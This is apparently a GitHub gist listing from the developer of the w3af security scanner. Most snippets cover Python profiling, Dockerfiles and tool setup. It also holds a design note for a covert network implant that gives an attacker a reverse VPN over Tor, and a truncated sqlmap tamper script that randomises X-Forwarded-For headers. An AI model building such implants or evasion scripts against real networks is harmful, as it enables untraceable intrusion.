Skip to content

Instantly share code, notes, and snippets.

View andresriancho's full-sized avatar
🎯
Focusing

Andres Riancho andresriancho

🎯
Focusing
973 followers · 13 following
View GitHub Profile
@andresriancho
andresriancho / Profiling performance of real world applications.md
Created March 16, 2015 13:05
Profiling performance of real world applications

Description

In this talk we’ll discuss the challenge of profiling CPU, RAM and key performance metrics in non-trivial Python applications. There are many great tools for finding CPU and RAM bottlenecks such as memory_profiler [0], objgraph [1] and line_profiler [2], but they all seem to be focused on profiling small functions.

Real world Python applications have tens of thousand of lines of code, use threads, sub-processes and other difficult-to-profile technologies. In this situation, the previous libraries do not scale well.

The talk goal is to the attendees through the tools and techniques used to profile w3af, a complex Python application maintained by the speaker. The techniques [3] are reusable and allow to gain deep insight for:

  • Top 10 functions with the most CPU usage
  • Top 10 lines of code allocating the most memory
@andresriancho
andresriancho / debug-pickle.py
Created March 17, 2015 01:14
Pickle debug
def debug_pickle(instance):
"""
:return: Which attribute from this object can't be pickled?
"""
attribute = None
for k, v in instance.__dict__.iteritems():
try:
cPickle.dumps(v)
except:
@andresriancho
andresriancho / ordered dict memory profiling.md
Last active August 29, 2015 14:21
Ordered dicts are hard (?)

TL;DR Use ruamel.ordereddict instead of Python's OrderedDict. Significant improvement in memory and CPU usage.

I was having memory issues with w3af so I started to experiment with different libraries for ordered dicts (since profiling was showing some strange things in that area). These are the results of some memory profiling tests I run:

  • Lower memory usage: 11.574 MiB ruamel.ordereddict
  • Higher memory usage: 69.742 MiB SQLMap's ordered dict; almost the same memory usage as the Python's collections.OrderedDict

When running the tests 100 times using timeit this is what I got on my workstation:

  • Faster: ruamel.ordereddict 7.66 seconds
@andresriancho
andresriancho / cswsh.py
Last active August 29, 2015 14:23
https://github.com/andresriancho/w3af/issues/10395
"""
cswsh.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
@andresriancho
andresriancho / w3af_api.md
Created June 23, 2015 11:40
w3af_api.md

Yesterday I completed the development of the REST API for w3af :) The documentation can be found here and the code is ready to use in the develop branch:

git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_api

Before merging it to the master branch I would love to hear your opinions, bug reports, etc. Thanks!

@andresriancho
andresriancho / Dockerfile
Created July 22, 2015 17:45
WAVSEP Dockerfile
FROM ubuntu:14.04
# Update Ubuntu
RUN apt-get update
RUN apt-get -y upgrade
# Add oracle java 7 repository
RUN apt-get -y install software-properties-common
RUN add-apt-repository ppa:webupd8team/java
RUN apt-get -y update
@andresriancho
andresriancho / gist:36b0e37940a37c85310d
Created July 22, 2015 17:58
WAVSEP Dockerfile
FROM tomcat:7.0.63-jre8
# Download WAVSEP
WORKDIR /usr/local/tomcat/webapps/
RUN wget https://github.com/sectooladdict/wavsep/archive/wavsep-v1.5-war.zip
RUN mv wavsep-v1.5-war.zip wavsep.war
@andresriancho
andresriancho / dawnscanner-installation.md
Created September 16, 2015 12:34
dawnscanner installation 
 $ gem cert --add <(curl -Ls https://raw.githubusercontent.com/thesp0nge/dawnscanner/master/certs/paolo_at_dawnscanner_dot_org.pem)
Added '/CN=paolo/DC=dawnscanner/DC=org'
$ gem install dawnscanner -P MediumSecurity
ERROR:  While executing gem ... (Gem::Security::Exception)
    certificate /CN=paolo/DC=codesake/DC=com not valid after 2015-01-27 17:25:01 UTC
$
@andresriancho
andresriancho / network-bugging.md
Last active December 27, 2017 06:38
Bugging a network: Reverse VPN over Tor

Network Bug: Reverse VPN over Tor

I would like to build a network bugging device that can be connected to any Ethernet network and grants the attacker access through a reverse VPN.

Since we don't want to go to jail the attacker's VPN server would be a Tor hidden service and the buggin device would perform a reverse connection over Tor. No direct connection to the attacker's IP address will ever be made.

All traffic between the attacker and the device will be encrypted by both Tor and the VPN.

It must be trivial for the attacker to route traffic from nmap, w3af, OpenVAS, metasploit and any other security tools through the VPN tunnel. Extra points if the VPN is Layer 2 and allows the attacker to run ARP-spoofing attacks (ssh layer 2 VPN?)

@andresriancho
andresriancho / random-xff.py
Created December 30, 2015 13:22
Random X-Forwarding-For tamper script for sqlmap
import random
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})